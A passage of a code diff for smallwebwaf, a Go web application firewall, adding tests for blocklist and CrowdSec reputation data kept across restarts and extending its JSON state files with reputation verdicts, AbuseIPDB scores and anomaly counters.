rulesDir = "SWWAF_RULES_DIR" rulesDir = "SWWAF_RULES_DIR"
lookupSource = "SWWAF_LOOKUP_SOURCE" lookupSource = "SWWAF_LOOKUP_SOURCE"
lookupDBPath = "SWWAF_LOOKUP_DB_PATH" lookupDBPath = "SWWAF_LOOKUP_DB_PATH"
@@ -248,6 +249,54 @@ func TestServesUntilToldToStop(t *testing.T) {
out.line(t, "msg", "stopped") out.line(t, "msg", "stopped")
} }
func TestLogLevelHoldsBackTheLessSevereProcessLines(t *testing.T) {
t.Parallel()
// A list that cannot be fetched has a warning written once smallwebwaf
// serves, after its starting line.
lists := httptest.NewServer(http.HandlerFunc(
func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusServiceUnavailable)
}))
t.Cleanup(lists.Close)
ctx, stop := context.WithCancel(t.Context())
out := &output{}
exited := make(chan int, 1)
go func() {
exited <- run(ctx, map[string]string{
listenAddr: localhost + ":0",
stateDir: t.TempDir(),
rulesDir: t.TempDir(),
"SWWAF_BLOCKLIST_URLS": lists.URL + "/tor.txt",
"SWWAF_LOG_LEVEL": "warn",
}, out)
}()
out.line(t, "msg", "fetching a list failed")
stop()
select {
case status := <-exited:
if status != 0 {
t.Fatalf("exit status %d, want 0; output:\n%s", status, out.text())
}
case <-time.After(waitLimit):
t.Fatal("still running after being told to stop")
}
// Not one of the info lines from the start to the stop.
for line := range strings.Lines(out.text()) {
var fields map[string]any
err := json.Unmarshal([]byte(line), &fields)
if err != nil || fields["level"] == "INFO" {
t.Errorf("line %q (%v), want none at info", line, err)
}
}
}
func TestEveryLogLineAndMetricCarriesTheInstanceName(t *testing.T) { func TestEveryLogLineAndMetricCarriesTheInstanceName(t *testing.T) {
t.Parallel() t.Parallel()
@@ -522,7 +571,7 @@ func TestLookupDatabaseReplacedWhileRunningTakesEffect(t *testing.T) {
// The requests sent until a replacement takes effect, and those // The requests sent until a replacement takes effect, and those
// for the metrics, must not break a rate limit, whose ban would // for the metrics, must not break a rate limit, whose ban would
// refuse them too. // refuse them too.
"SWWAF_RATE_LIMIT_EXEMPT_NETS": placed + "," + localhost, rateLimitExemptNets: placed + "," + localhost,
} }
began := time.Now() began := time.Now()
// Each replacement is written beside the file and renamed over it, as // Each replacement is written beside the file and renamed over it, as
@@ -573,6 +622,185 @@ func TestLookupDatabaseReplacedWhileRunningTakesEffect(t *testing.T) {
} }
} }
func TestBlocklistTriesAndCopiesKeptInReputationJSONAcrossRestarts(t *testing.T) {
t.Parallel()
const (
token = "0123456789abcdef0123456789abcdef"
torPath = "/tor.txt"
dropPath = "/drop.txt"
// copyright is the DROP list's date and copyright line.
copyright = "; Spamhaus DROP List 2026/10/07 - (c) 2026 The Spamhaus Project SLL"
)
failing, torFetches := new(atomic.Bool), new(atomic.Int32)
lists := map[string]string{
torPath: "198.51.100.0/24\n",
dropPath: copyright + "\n" + placed + " ; SBL1\n",
}
server := httptest.NewServer(http.HandlerFunc(
func(w http.ResponseWriter, r *http.Request) {
if r.URL.Path == torPath {
torFetches.Add(1)
}
if failing.Load() {
w.WriteHeader(http.StatusServiceUnavailable)
return
}
_, _ = io.WriteString(w, lists[r.URL.Path])
}))
t.Cleanup(server.Close)
torURL, dropURL := server.URL+torPath, server.URL+dropPath
dir := t.TempDir()
env := map[string]string{
listenAddr: localhost + ":0",
upstreamURL: startApp(t),
stateDir: dir,
rulesDir: t.TempDir(),
trustedProxies: localhost + "/32",
metricsToken: token,
instanceName: instance,
"SWWAF_BLOCKLIST_URLS": torURL,
// The requests sent until the list takes effect, and those for the
// metrics, must not break a rate limit, whose ban would refuse them
// too.
rateLimitExemptNets: placed + "," + localhost,
}
failures := `smallwebwaf_reputation_failures_total{instance="fsn1app1/gitea",` +
`source="` + torURL + `"} `
// tor.txt cannot be fetched at first, which is counted.
failing.Store(true)
runUntilStopped(t, env, func(url string) {
metricsWith(t, url+"_smallwebwaf/metrics", token, failures+"1")
})
// Restarted with drop.txt named after it and the server answering, tor.txt
// waits SWWAF_BLOCKLIST_REFRESH after its failed try, kept in reputation.json,
// while drop.txt, never tried, is fetched at once. Lists are fetched in the
// order named, so once drop.txt refuses the client, tor.txt has had its turn.
failing.Store(false)
env["SWWAF_BLOCKLIST_URLS"] = torURL + "," + dropURL
out := runUntilStopped(t, env, func(url string) {
for statusFrom(t, url, placed) != http.StatusForbidden {
time.Sleep(pollInterval)
}
})
wantDeniedByList(t, out.line(t, "action", "denied"), dropURL)
if fetches := torFetches.Load(); fetches != 1 {
t.Errorf("tor.txt fetched %d times, want once, before the restart", fetches)
}
// After another restart, with the server failing, the copy of drop.txt
// kept in reputation.json, its copyright line included, refuses the
// client from the first request.
failing.Store(true)
out = runUntilStopped(t, env, func(url string) {
wantStatus(t, url, placed, http.StatusForbidden)
})
wantDeniedByList(t, out.line(t, "type", "request"), dropURL)
path := filepath.Join(dir, "reputation.json")
kept, err := os.ReadFile(path) //nolint:gosec // a file in the test's directory
if err != nil || !strings.Contains(string(kept), `"`+copyright+`"`) {
t.Errorf("reputation.json holds\n%s\nwant the copy with %q (%v)", kept, copyright,
err)
}
}
func TestCrowdSecDecisionListKeptInReputationJSONAcrossARestart(t *testing.T) {
t.Parallel()
const bouncerKey = "crowdsec-key-0123456789abcdef"
// A stand-in for the engine's local API, which bans 203.0.113.0/24 for
// four hours, and answers only a request with its key, while it is up.
down := new(atomic.Bool)
engine := httptest.NewServer(http.HandlerFunc(
func(w http.ResponseWriter, r *http.Request) {
switch {
case r.URL.Path != "/v1/decisions" || r.Header.Get("X-Api-Key") != bouncerKey:
w.WriteHeader(http.StatusForbidden)
case down.Load():
w.WriteHeader(http.StatusServiceUnavailable)
default:
_, _ = io.WriteString(w, `[{"duration": "4h0m0s", "origin": "crowdsec", `+
`"scenario": "crowdsecurity/http-probing", "scope": "Range", `+
`"type": "ban", "value": "203.0.113.0/24"}]`)
}
}))
t.Cleanup(engine.Close)
dir := t.TempDir()
env := map[string]string{
listenAddr: localhost + ":0",
upstreamURL: startApp(t),
stateDir: dir,
rulesDir: t.TempDir(),
trustedProxies: localhost + "/32",
"SWWAF_CROWDSEC_LAPI_URL": engine.URL,
"SWWAF_CROWDSEC_LAPI_KEY": bouncerKey,
}
// Once the list is fetched, the client's request bans it.
first := runUntilStopped(t, env, func(url string) {
for statusFrom(t, url, placed) != http.StatusForbidden {
time.Sleep(pollInterval)
}
})
ban := onlyBan(t, dir)
if ban["netblock"] != placed+"/32" || ban["cause"] != "crowdsec" ||
ban["reason"] != "CrowdSec's decision for crowdsecurity/http-probing" {
t.Errorf("bans.json holds %v, want the ban for crowdsec on %s", ban, placed)
}
// Restarted with the engine down, the copy kept in reputation.json bans
// another client in the netblock from its first request.
down.Store(true)
second := runUntilStopped(t, env, func(url string) {
wantStatus(t, url, "203.0.113.10", http.StatusForbidden)
})
// The key is in neither run's output, nor in a state file.
files := []string{"bans.json", "reputation.json", "clients.json"}
shown := make([]string, 0, len(files)+2)
shown = append(shown, first.text(), second.text())
for _, name := range files {
data, err := os.ReadFile(filepath.Join(dir, name)) //nolint:gosec // the test's
if err != nil {
t.Fatalf("read %s: %v", name, err)
}
shown = append(shown, string(data))
}
if all := strings.Join(shown, "\n"); strings.Contains(all, bouncerKey) {
t.Errorf("the key is shown in the output or the state files:\n%s", all)
}
}
// wantDeniedByList checks that the request log line is of a request the
// blocklist at listURL refused.
func wantDeniedByList(t *testing.T, line map[string]any, listURL string) {
t.Helper()
reputation, _ := line["reputation"].([]any)
if line["action"] != "denied" || len(reputation) != 1 || reputation[0] != listURL {
t.Errorf("request log line %v, want one denied for %s", line, listURL)
}
}
func TestLookupDatabaseThatCannotBeReadStopsTheStart(t *testing.T) { func TestLookupDatabaseThatCannotBeReadStopsTheStart(t *testing.T) {
t.Parallel() t.Parallel()
@@ -1014,7 +1242,7 @@ func wantStartingLine(t *testing.T, line map[string]any, appURL, dir string) {
"SWWAF_REQUEST_MAX_BYTES": "100M", "SWWAF_REQUEST_MAX_BYTES": "100M",
"SWWAF_RESPONSE_MAX_BYTES": "5G", "SWWAF_RESPONSE_MAX_BYTES": "5G",
"SWWAF_ALLOW_NETS": "", "SWWAF_ALLOW_NETS": "",
"SWWAF_RATE_LIMIT_EXEMPT_NETS": "", rateLimitExemptNets: "",
"SWWAF_DENY_NETS": "", "SWWAF_DENY_NETS": "",
"SWWAF_RATE_LIMIT_PER_MINUTE": "1000", "SWWAF_RATE_LIMIT_PER_MINUTE": "1000",
"SWWAF_RATE_LIMIT_PER_HOUR": "10000", "SWWAF_RATE_LIMIT_PER_HOUR": "10000",
+240 -37
View File
@@ -1,8 +1,11 @@
// Package state keeps smallwebwaf's state in JSON files in // Package state keeps smallwebwaf's state in JSON files in
// SWWAF_STATE_DIR, as the "Persistent state" section of SPEC.md describes: // SWWAF_STATE_DIR, as the "Persistent state" section of SPEC.md describes:
// bans.json holds the bans, clients.json each client's counters and // bans.json holds the bans, clients.json each client's counters and
// history, lookups.json GeoJS's answers, and alerts.json the cooldowns, // history, lookups.json GeoJS's answers, reputation.json the last try and
// the hour under way and the alerts waiting for each destination. Load // last good copy of each list fetched from a URL, the DNSBL zones'
// verdicts, and AbuseIPDB's scores and checks spent, and alerts.json the
// cooldowns, the hour under way, the alerts waiting for each destination
// and the anomaly counters. Load
// reads them at start, Watch takes in an admin's edit of one while // reads them at start, Watch takes in an admin's edit of one while
// smallwebwaf runs, and Run and WriteAll write them. The disk is read and // smallwebwaf runs, and Run and WriteAll write them. The disk is read and
// written outside the parts' locks, which are held only to take a // written outside the parts' locks, which are held only to take a
@@ -29,10 +32,12 @@ import (
"github.com/fsnotify/fsnotify" "github.com/fsnotify/fsnotify"
"sneak.berlin/go/smallwebwaf/internal/alerts" "sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/anomaly"
"sneak.berlin/go/smallwebwaf/internal/bans" "sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/lookup" "sneak.berlin/go/smallwebwaf/internal/lookup"
"sneak.berlin/go/smallwebwaf/internal/metrics" "sneak.berlin/go/smallwebwaf/internal/metrics"
"sneak.berlin/go/smallwebwaf/internal/ratelimit" "sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/reputation"
) )
// version is the version of the files' format, the only one read. // version is the version of the files' format, the only one read.
@@ -47,6 +52,7 @@ const (
bansJSON = "bans.json" bansJSON = "bans.json"
clientsJSON = "clients.json" clientsJSON = "clients.json"
lookupsJSON = "lookups.json" lookupsJSON = "lookups.json"
reputationJSON = "reputation.json"
alertsJSON = "alerts.json" alertsJSON = "alerts.json"
) )
@@ -54,8 +60,9 @@ var (
errVersion = errors.New("unknown version") errVersion = errors.New("unknown version")
// errMissing is for an entry without a field it needs. // errMissing is for an entry without a field it needs.
errMissing = errors.New("has no") errMissing = errors.New("has no")
errCause = errors.New("is not limit, attack or admin") errCause = errors.New("is not limit, attack, admin or crowdsec")
errDestination = errors.New("is not webhook, slack or ntfy") errDestination = errors.New("is not webhook, slack or ntfy")
errScope = errors.New("is not client, net, asn, total or watch")
errWaitingList = errors.New(`waiting is a list, but now lists the alerts by ` + errWaitingList = errors.New(`waiting is a list, but now lists the alerts by ` +
`destination: put the list under "webhook", as "waiting": {"webhook": [...]}, ` + `destination: put the list under "webhook", as "waiting": {"webhook": [...]}, ` +
`or remove the file`) `or remove the file`)
@@ -70,13 +77,17 @@ type Params struct {
// is (SWWAF_STATE_COUNTER_INTERVAL). // is (SWWAF_STATE_COUNTER_INTERVAL).
WriteDelay time.Duration WriteDelay time.Duration
CounterInterval time.Duration CounterInterval time.Duration
// Ledger, Limiter, GeoJS and Alerts hold the state. Alerts also // Ledger, Limiter, GeoJS, Lists, DNSBL, AbuseIPDB, Alerts and Anomalies
// receive a file_error alert for an edit set aside, and for a write // hold the state. Alerts also receive a file_error alert for an edit set
// that fails while smallwebwaf runs. // aside, and for a write that fails while smallwebwaf runs.
Ledger *bans.Ledger Ledger *bans.Ledger
Limiter *ratelimit.Limiter Limiter *ratelimit.Limiter
GeoJS *lookup.GeoJS GeoJS *lookup.GeoJS
Lists *reputation.Lists
DNSBL *reputation.DNSBL
AbuseIPDB *reputation.AbuseIPDB
Alerts *alerts.Queue Alerts *alerts.Queue
Anomalies *anomaly.Counters
// Now tells the time by which the counters' buckets run out, normally // Now tells the time by which the counters' buckets run out, normally
// time.Now in UTC. // time.Now in UTC.
Now func() time.Time Now func() time.Time
@@ -134,12 +145,24 @@ type lookupsFile struct {
Lookups []lookup.Answer `json:"lookups"` Lookups []lookup.Answer `json:"lookups"`
} }
// reputationFile is reputation.json, indented for an admin to read and
// edit, so that each line of a list's copy is on a line of its own.
type reputationFile struct {
Version int `json:"version"`
Lists []reputation.List `json:"lists"`
Verdicts []reputation.Verdict `json:"verdicts"`
AbuseIPDB reputation.Checks `json:"abuseipdb"`
}
// alertsFile is alerts.json, indented for an admin to read and edit. // alertsFile is alerts.json, indented for an admin to read and edit.
//
//nolint:tagliatelle // the state files use snake_case, as the request log does
type alertsFile struct { type alertsFile struct {
Version int `json:"version"` Version int `json:"version"`
Cooldowns []alerts.Cooldown `json:"cooldowns"` Cooldowns []alerts.Cooldown `json:"cooldowns"`
Hour alerts.Hour `json:"hour"` Hour alerts.Hour `json:"hour"`
Waiting map[string][]alerts.Alert `json:"waiting"` Waiting map[string][]alerts.Alert `json:"waiting"`
AnomalyCounters []anomaly.Counter `json:"anomaly_counters"`
} }
// stateFile is the struct of a state file. Once the file is decoded, its // stateFile is the struct of a state file. Once the file is decoded, its
@@ -152,10 +175,10 @@ type stateFile interface {
} }
// Load checks that files can be written in Dir, and reads the state files // Load checks that files can be written in Dir, and reads the state files
// in it into the ledger, the limiter and GeoJS. A missing file is empty // in it into the parts of Params that hold the state. A missing file is
// state, as on a first start. A file that does not parse, has an unknown // empty state, as on a first start. A file that does not parse, has an
// version, or has an entry without a field it needs, is an error that // unknown version, or has an entry without a field it needs, is an error
// names the file and, where the JSON decoder tells it, the line and // that names the file and, where the JSON decoder tells it, the line and
// column, or else the entry. // column, or else the entry.
func Load(params Params) (*Files, error) { func Load(params Params) (*Files, error) {
err := checkWritable(params.Dir) err := checkWritable(params.Dir)
@@ -168,16 +191,17 @@ func Load(params Params) (*Files, error) {
bansRead, bansErr := f.read(bansJSON) bansRead, bansErr := f.read(bansJSON)
clientsRead, clientsErr := f.read(clientsJSON) clientsRead, clientsErr := f.read(clientsJSON)
lookupsRead, lookupsErr := f.read(lookupsJSON) lookupsRead, lookupsErr := f.read(lookupsJSON)
reputationRead, reputationErr := f.read(reputationJSON)
alertsRead, alertsErr := f.read(alertsJSON) alertsRead, alertsErr := f.read(alertsJSON)
err = errors.Join(bansErr, clientsErr, lookupsErr, alertsErr) err = errors.Join(bansErr, clientsErr, lookupsErr, reputationErr, alertsErr)
if err != nil { if err != nil {
return nil, err return nil, err
} }
params.ProcessLog.Info("read the state files", "directory", params.Dir, params.ProcessLog.Info("read the state files", "directory", params.Dir,
"bans", bansRead, "clients", clientsRead, "lookups", lookupsRead, "bans", bansRead, "clients", clientsRead, "lookups", lookupsRead,
"alerts_waiting", alertsRead) "lists", reputationRead, "alerts_waiting", alertsRead)
return f, nil return f, nil
} }
@@ -206,7 +230,9 @@ func (f *Files) Run(ctx context.Context) {
f.logFailure(bansJSON, f.writeFile(bansJSON)) f.logFailure(bansJSON, f.writeFile(bansJSON))
case <-interval.C: case <-interval.C:
for _, name := range []string{bansJSON, clientsJSON, lookupsJSON, alertsJSON} { for _, name := range []string{
bansJSON, clientsJSON, lookupsJSON, reputationJSON, alertsJSON,
} {
f.logFailure(name, f.writeFile(name)) f.logFailure(name, f.writeFile(name))
} }
} }
@@ -217,7 +243,7 @@ func (f *Files) Run(ctx context.Context) {
// fails does not keep the others from being written. // fails does not keep the others from being written.
func (f *Files) WriteAll() error { func (f *Files) WriteAll() error {
return errors.Join(f.writeFile(bansJSON), f.writeFile(clientsJSON), return errors.Join(f.writeFile(bansJSON), f.writeFile(clientsJSON),
f.writeFile(lookupsJSON), f.writeFile(alertsJSON)) f.writeFile(lookupsJSON), f.writeFile(reputationJSON), f.writeFile(alertsJSON))
} }
// Watch watches Dir until ctx is done, and takes in an admin's edit of a // Watch watches Dir until ctx is done, and takes in an admin's edit of a
@@ -252,7 +278,7 @@ func (f *Files) Watch(ctx context.Context) {
return return
case event := <-watcher.Events: case event := <-watcher.Events:
switch name := filepath.Base(event.Name); name { switch name := filepath.Base(event.Name); name {
case bansJSON, clientsJSON, lookupsJSON, alertsJSON: case bansJSON, clientsJSON, lookupsJSON, reputationJSON, alertsJSON:
f.fileChanged(name) f.fileChanged(name)
} }
case err = <-watcher.Errors: case err = <-watcher.Errors:
@@ -398,7 +424,40 @@ func (f *Files) takeIn(name string, data []byte, edit bool) (int, error) {
f.params.GeoJS.Load(file.Lookups) f.params.GeoJS.Load(file.Lookups)
entries = len(file.Lookups) entries = len(file.Lookups)
case reputationJSON:
var file reputationFile
err := parse(path, data, &file)
if err != nil {
return 0, err
}
err = f.params.Lists.Load(file.Lists)
if err != nil {
return 0, fmt.Errorf("%s: %w", path, err)
}
f.params.DNSBL.Load(file.Verdicts)
f.params.AbuseIPDB.Load(file.AbuseIPDB)
entries = len(file.Lists)
case alertsJSON: case alertsJSON:
waiting, err := f.takeInAlerts(path, data)
if err != nil {
return 0, err
}
entries = waiting
}
f.sums[name] = sha256.Sum256(data)
return entries, nil
}
// takeInAlerts parses data, what alerts.json, at path, holds, puts it
// into the alerts and the anomaly counters, in place of what they held,
// and returns how many alerts wait in it, as takeIn describes.
func (f *Files) takeInAlerts(path string, data []byte) (int, error) {
// waiting was a list, of the alerts waiting for the webhook, before // waiting was a list, of the alerts waiting for the webhook, before
// alerts went to Slack and ntfy too. // alerts went to Slack and ntfy too.
var written struct { var written struct {
@@ -420,13 +479,12 @@ func (f *Files) takeIn(name string, data []byte, edit bool) (int, error) {
f.params.Alerts.Load(alerts.State{ f.params.Alerts.Load(alerts.State{
Cooldowns: file.Cooldowns, Hour: file.Hour, Waiting: file.Waiting, Cooldowns: file.Cooldowns, Hour: file.Hour, Waiting: file.Waiting,
}) })
f.params.Anomalies.Load(file.AnomalyCounters, f.params.Now())
entries := 0
for _, waiting := range file.Waiting { for _, waiting := range file.Waiting {
entries += len(waiting) entries += len(waiting)
} }
}
f.sums[name] = sha256.Sum256(data)
return entries, nil return entries, nil
} }
@@ -506,25 +564,31 @@ func (f *Files) setAside(name string, parseErr error) error {
func (f *Files) encode(name string) ([]byte, error) { func (f *Files) encode(name string) ([]byte, error) {
switch name { switch name {
case bansJSON: case bansJSON:
file := bansFile{Version: version, Bans: BanEntries(f.params.Ledger.Snapshot())} return encodeIndented(bansFile{
Version: version, Bans: BanEntries(f.params.Ledger.Snapshot()),
data, err := json.MarshalIndent(file, "", " ") })
if err != nil {
return nil, err
}
return append(data, '\n'), nil
case clientsJSON: case clientsJSON:
return encodeOnePerLine("clients", f.params.Limiter.Snapshot()) return encodeOnePerLine("clients", f.params.Limiter.Snapshot())
case lookupsJSON: case lookupsJSON:
return encodeOnePerLine("lookups", f.params.GeoJS.Snapshot()) return encodeOnePerLine("lookups", f.params.GeoJS.Snapshot())
case reputationJSON:
return encodeIndented(reputationFile{
Version: version, Lists: f.params.Lists.Snapshot(),
Verdicts: f.params.DNSBL.Snapshot(), AbuseIPDB: f.params.AbuseIPDB.Snapshot(),
})
default: // alerts.json default: // alerts.json
held := f.params.Alerts.Snapshot() held := f.params.Alerts.Snapshot()
file := alertsFile{
return encodeIndented(alertsFile{
Version: version, Cooldowns: held.Cooldowns, Hour: held.Hour, Version: version, Cooldowns: held.Cooldowns, Hour: held.Hour,
Waiting: held.Waiting, Waiting: held.Waiting, AnomalyCounters: f.params.Anomalies.Snapshot(),
})
}
} }
// encodeIndented encodes file, a state file's struct, indented for an
// admin to read and edit.
func encodeIndented(file any) ([]byte, error) {
data, err := json.MarshalIndent(file, "", " ") data, err := json.MarshalIndent(file, "", " ")
if err != nil { if err != nil {
return nil, err return nil, err
@@ -532,7 +596,6 @@ func (f *Files) encode(name string) ([]byte, error) {
return append(data, '\n'), nil return append(data, '\n'), nil
} }
}
// BanEntries returns held as bans.json lists them, an empty list for // BanEntries returns held as bans.json lists them, an empty list for
// none. // none.
@@ -584,7 +647,7 @@ func (e BanEntry) ban() bans.Ban {
// worked out, or an expires, which would make it permanent. A permanent // worked out, or an expires, which would make it permanent. A permanent
// ban's expires is null, which Bans cannot tell from a missing one, so // ban's expires is null, which Bans cannot tell from a missing one, so
// each expires is read again as written. A cause other than limit, // each expires is read again as written. A cause other than limit,
// attack or admin, most likely misspelt, is refused too. // attack, admin or crowdsec, most likely misspelt, is refused too.
func (f *bansFile) check(data []byte) error { func (f *bansFile) check(data []byte) error {
var written struct { var written struct {
Bans []struct { Bans []struct {
@@ -606,7 +669,8 @@ func (f *bansFile) check(data []byte) error {
case written.Bans[i].Expires == nil: case written.Bans[i].Expires == nil:
return missing(i, "expires") return missing(i, "expires")
case entry.Cause != "" && entry.Cause != bans.CauseLimit && case entry.Cause != "" && entry.Cause != bans.CauseLimit &&
entry.Cause != bans.CauseAttack && entry.Cause != bans.CauseAdmin: entry.Cause != bans.CauseAttack && entry.Cause != bans.CauseAdmin &&
entry.Cause != bans.CauseCrowdSec:
return fmt.Errorf("entry %d's cause %q %w", i+1, entry.Cause, errCause) return fmt.Errorf("entry %d's cause %q %w", i+1, entry.Cause, errCause)
} }
} }
@@ -615,8 +679,8 @@ func (f *bansFile) check(data []byte) error {
} }
// check refuses a client without its address, which would count nobody's // check refuses a client without its address, which would count nobody's
// requests, or with requests in a window but no start, which would drop // requests, or with requests, bytes or refusals in a window but no start,
// them and give the client a fresh allowance. // which would drop them and give the client a fresh allowance.
func (f *clientsFile) check([]byte) error { func (f *clientsFile) check([]byte) error {
for i, client := range f.Clients { for i, client := range f.Clients {
switch { switch {
@@ -628,6 +692,14 @@ func (f *clientsFile) check([]byte) error {
return missing(i, "hour.start") return missing(i, "hour.start")
case countsWithoutStart(client.Day): case countsWithoutStart(client.Day):
return missing(i, "day.start") return missing(i, "day.start")
case countsWithoutStart(client.MinuteBytes):
return missing(i, "minute_bytes.start")
case countsWithoutStart(client.HourBytes):
return missing(i, "hour_bytes.start")
case countsWithoutStart(client.DayBytes):
return missing(i, "day_bytes.start")
case countsWithoutStart(client.MinuteRefusals):
return missing(i, "minute_refusals.start")
} }
} }
@@ -665,10 +737,92 @@ func (f *lookupsFile) check(data []byte) error {
return nil return nil
} }
// check refuses a list without its URL, which would name no list, or the
// time it was last tried, which would have it fetched at once, and a copy
// of it without the time it was fetched, or without its lines, which hold
// the list. It refuses a verdict without its zone or its client, which
// would be about no one, whether the zone lists the client, or the time
// it was fetched, which would drop it, and so an AbuseIPDB score without
// its client, the score, or the time it was fetched. A verdict's listed is
// false for a client the zone does not list, and a score can be 0, which
// the structs cannot tell from a missing one, so each is read again as
// written.
func (f *reputationFile) check(data []byte) error {
for i, kept := range f.Lists {
switch {
case kept.URL == "":
return missing(i, "url")
case kept.Tried.IsZero():
return missing(i, "tried")
case kept.Fetched.IsZero() && kept.Lines != nil:
return missing(i, "fetched")
case kept.Lines == nil && !kept.Fetched.IsZero():
return missing(i, "lines")
}
}
var written struct {
Verdicts []struct {
Listed *bool `json:"listed"`
} `json:"verdicts"`
}
err := json.Unmarshal(data, &written)
if err != nil {
return err
}
for i, verdict := range f.Verdicts {
switch {
case verdict.Zone == "":
return fmt.Errorf("verdicts %w", missing(i, "zone"))
case !verdict.Client.IsValid():
return fmt.Errorf("verdicts %w", missing(i, "client"))
case written.Verdicts[i].Listed == nil:
return fmt.Errorf("verdicts %w", missing(i, "listed"))
case verdict.Fetched.IsZero():
return fmt.Errorf("verdicts %w", missing(i, "fetched"))
}
}
return checkScores(f.AbuseIPDB.Scores, data)
}
// checkScores refuses an AbuseIPDB score, of scores, read from data, as
// reputationFile's check describes.
func checkScores(scores []reputation.Score, data []byte) error {
var written struct {
AbuseIPDB struct {
Scores []struct {
Score *int64 `json:"score"`
} `json:"scores"`
} `json:"abuseipdb"`
}
err := json.Unmarshal(data, &written)
if err != nil {
return err
}
for i, kept := range scores {
switch {
case !kept.Client.IsValid():
return fmt.Errorf("abuseipdb scores %w", missing(i, "client"))
case written.AbuseIPDB.Scores[i].Score == nil:
return fmt.Errorf("abuseipdb scores %w", missing(i, "score"))
case kept.Fetched.IsZero():
return fmt.Errorf("abuseipdb scores %w", missing(i, "fetched"))
}
}
return nil
}
// check refuses a cooldown without its event or when its alert was sent, // check refuses a cooldown without its event or when its alert was sent,
// which would hold back no repeat, alerts waiting for a destination with // which would hold back no repeat, alerts waiting for a destination with
// another name than webhook, slack or ntfy, most likely misspelt, and an // another name than webhook, slack or ntfy, most likely misspelt, an
// alert waiting without its event or its time. // alert waiting without its event or its time, and an anomaly counter as
// checkAnomalyCounters does.
func (f *alertsFile) check([]byte) error { func (f *alertsFile) check([]byte) error {
for i, cooldown := range f.Cooldowns { for i, cooldown := range f.Cooldowns {
switch { switch {
@@ -694,11 +848,60 @@ func (f *alertsFile) check([]byte) error {
} }
} }
return checkAnomalyCounters(f.AnomalyCounters)
}
// checkAnomalyCounters refuses an anomaly counter whose scope is not
// client, net, asn, total or watch, most likely misspelt, and one without
// a field it needs, as missingFromCounter tells.
func checkAnomalyCounters(counters []anomaly.Counter) error {
for i, counter := range counters {
if !slices.Contains(anomaly.Scopes(), counter.Scope) {
return fmt.Errorf("anomaly_counters entry %d's scope %q %w", i+1,
counter.Scope, errScope)
}
field := missingFromCounter(counter)
if field != "" {
return fmt.Errorf("anomaly_counters %w", missing(i, field))
}
}
return nil return nil
} }
// countsWithoutStart reports whether b holds requests but no start, which // missingFromCounter returns the first field counter, an anomaly counter,
// places them in time. // needs and has not, or "" when it has them all: what tells it from the
// others in its scope, without which it would never be counted again, the
// netblock of a client, net or watch counter, the AS number of an asn one
// and the name of a watch one; and the start of a window in which it has
// requests or bytes, without which they would be dropped.
func missingFromCounter(counter anomaly.Counter) string {
scope := counter.Scope
switch {
case scope != anomaly.ScopeASN && scope != anomaly.ScopeTotal &&
!counter.Netblock.IsValid():
return "netblock"
case scope == anomaly.ScopeASN && counter.ASN == "":
return "asn"
case scope == anomaly.ScopeWatch && counter.Name == "":
return "name"
case countsWithoutStart(counter.Minute):
return "minute.start"
case countsWithoutStart(counter.Hour):
return "hour.start"
case countsWithoutStart(counter.MinuteBytes):
return "minute_bytes.start"
case countsWithoutStart(counter.HourBytes):
return "hour_bytes.start"
default:
return ""
}
}
// countsWithoutStart reports whether b holds requests, bytes or refusals
// but no start, which places them in time.
func countsWithoutStart(b ratelimit.Buckets) bool { func countsWithoutStart(b ratelimit.Buckets) bool {
return b.Start.IsZero() && (b.Current != 0 || b.Previous != 0) return b.Start.IsZero() && (b.Current != 0 || b.Previous != 0)
} }
+514 -32
View File
@@ -22,10 +22,12 @@ import (
"time" "time"
"sneak.berlin/go/smallwebwaf/internal/alerts" "sneak.berlin/go/smallwebwaf/internal/alerts"
"sneak.berlin/go/smallwebwaf/internal/anomaly"
"sneak.berlin/go/smallwebwaf/internal/bans" "sneak.berlin/go/smallwebwaf/internal/bans"
"sneak.berlin/go/smallwebwaf/internal/lookup" "sneak.berlin/go/smallwebwaf/internal/lookup"
"sneak.berlin/go/smallwebwaf/internal/metrics" "sneak.berlin/go/smallwebwaf/internal/metrics"
"sneak.berlin/go/smallwebwaf/internal/ratelimit" "sneak.berlin/go/smallwebwaf/internal/ratelimit"
"sneak.berlin/go/smallwebwaf/internal/reputation"
"sneak.berlin/go/smallwebwaf/internal/state" "sneak.berlin/go/smallwebwaf/internal/state"
) )
@@ -34,7 +36,13 @@ const (
bansJSON = "bans.json" bansJSON = "bans.json"
clientsJSON = "clients.json" clientsJSON = "clients.json"
lookupsJSON = "lookups.json" lookupsJSON = "lookups.json"
reputationJSON = "reputation.json"
alertsJSON = "alerts.json" alertsJSON = "alerts.json"
// blocklistURL and torURL are the blocklists the tests' lists name, and
// dnsblZone the DNSBL zone of the tests' verdicts.
blocklistURL = "https://lists.example/drop.txt"
torURL = "https://lists.example/tor.txt"
dnsblZone = "dnsbl.example"
// The AS number and AS name the tests' clients are looked up in. // The AS number and AS name the tests' clients are looked up in.
asn = "AS64496" asn = "AS64496"
asName = "Example Net" asName = "Example Net"
@@ -45,6 +53,9 @@ const (
// maxLogLines is how many lines of the process log wait for a test to // maxLogLines is how many lines of the process log wait for a test to
// read them. // read them.
maxLogLines = 64 maxLogLines = 64
// whole is the percentage of each limit a client gets when nothing
// lowers its limits.
whole = 100
) )
// permanentBansJSON is bans.json holding permanentBan. // permanentBansJSON is bans.json holding permanentBan.
@@ -64,6 +75,15 @@ const permanentBansJSON = `{
"limit": 1000, "limit": 1000,
"window": "minute", "window": "minute",
"count": 1000.5, "count": 1000.5,
"reputation": [
{
"source": "https://lists.example/drop.txt"
},
{
"source": "abuseipdb",
"score": 100
}
],
"request": { "request": {
"time": "2026-10-06T00:00:00Z", "time": "2026-10-06T00:00:00Z",
"method": "GET", "method": "GET",
@@ -77,7 +97,8 @@ const permanentBansJSON = `{
"earlier_bans": { "earlier_bans": {
"limit": 3, "limit": 3,
"attack": 1, "attack": 1,
"admin": 1 "admin": 1,
"crowdsec": 2
} }
} }
} }
@@ -153,6 +174,104 @@ const filledAlertsJSON = `{
"suppressed_repeats": 0 "suppressed_repeats": 0
} }
] ]
},
"anomaly_counters": [
{
"scope": "asn",
"asn": "AS64496",
"hour_bytes": {
"start": "2026-10-06T00:00:00Z",
"current": 8,
"previous": 0
}
},
{
"scope": "net",
